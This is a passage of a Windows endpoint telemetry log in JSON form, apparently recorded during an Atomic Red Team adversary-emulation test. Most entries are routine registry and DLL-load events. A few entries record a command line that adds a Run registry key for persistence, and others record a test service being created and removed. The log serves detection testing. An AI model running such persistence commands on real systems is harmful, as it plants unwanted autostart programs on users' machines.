Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\DeleteFlag", - "registry_value": "DeleteFlag", - "timestamp": 131883570850740000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start", - "registry_value": "Start", - "timestamp": 131883570850740000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_value": "AtomicTestService", - "timestamp": 131883570850740000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 260, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570852680000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852610000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852610000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852610000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852610000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852610000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" - }, - { - "command_line": "REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6156, - "ppid": 260, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}", - "unique_ppid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - 